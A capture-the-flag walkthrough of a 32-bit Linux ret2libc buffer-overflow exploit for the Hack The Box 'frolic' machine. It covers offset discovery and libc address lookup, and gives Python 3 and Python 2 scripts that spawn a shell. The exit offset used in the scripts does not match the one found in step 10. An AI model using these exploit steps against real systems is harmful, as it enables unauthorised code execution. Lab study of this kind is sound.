Linux Buffer overflow Data Execution Prevention(DEP) bypass with ASLR disabled

Note: this scenerio is in frolic htb machine.

32 bit os

ROP(Return-Oriented Programming) exploit-

1. Download the binary into local machine for testing.
2. Run the binary with gdb and pass a parameter. Parameter is getting printed back on the screen.

gdb rop
r Golu

3. Creating and sending long pattern string:

/usr/bin/msf-pattern_create -l 100

r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

We got Segmentation fault!

We can use gdb’s pattern create option also:

4. Finding offset:

a) Note the EIP value(b7Ab) and pass it to the pattern offset script:

/usr/bin/msf-pattern_offset -q b7Ab -l 100

Also we can use gdb offset option:

pattern_offset 0x41474141

5. Confirming offset(52):

We will send 52 A’s which is nothing but x41 in hexadecimal and adding 4 B’s to it which is x42 in hexadecimal.

r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

We can see EIP has 4 B’s 0x42424242. Now we are able to control EIP.

6. Checking status of different memory protection mechanisms:

Note: NX(DEP-Data Execution Prevention) is enabled therefore we can not jump to our shellcode, if we have passed that as input onto stack.

7. Checking ASLR(Address space layout randomization) status on target:

0 means protection is disabled

cat /proc/sys/kernel/randomize_va_space

If it is set to 1 then it will check in binary if PIE support is there or not.

If it is set to 2 then ASLR will be enabled regardless even if binary has PIE support or not.

8. Finding address of libc:

ldd rop

0xb7e19000

9. Finding address of system function in libc shared library:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

0x0003ada0

10. Finding address of exit function in libc shared library:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit

0x000b07c8

11. Finding address of string /bin/sh in libc shared library:

strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"

15ba0b

We need to pad this with zeros.

0x0015ba0b

12. Okay so far we have all the prerequisites for creating a exploit script. So let’s do that:)

a) Python3-

#!/usr/bin/python3
from pwn import *
junk= b'A'*52
libc_addr = p32(0xb7e19000, endian='little')
system_addr = p32(0xb7e19000+0x0003ada0, endian='little')
exit_addr = p32(0xb7e19000+0x0002e9d0, endian='little')
binsh_addr = p32(0xb7e19000+0x0015ba0b, endian='little')
payload = junk + system_addr + exit_addr + binsh_addr
f=open("payload.txt","wb")
f.write(payload)
f.close()

b) Passing payload file data to program.

/home/ayush/.binary/rop `cat payload.txt`

Note: in python3 I was unable to add the two addresses in hex using struct module, therefore used pwntools instead.

Python2-

#!/usr/bin/python2
import struct
junk= 'A'*52
libc_addr = 0xb7e19000
system_addr = struct.pack("<I",libc_addr + 0x0003ada0)
exit_addr = struct.pack("<I",libc_addr + 0x0002e9d0)
binsh_addr = struct.pack("<I",libc_addr + 0x0015ba0b)
payload_addr = junk + system_addr + exit_addr + binsh_addr
print payload_addr

Thank you for reading!

References: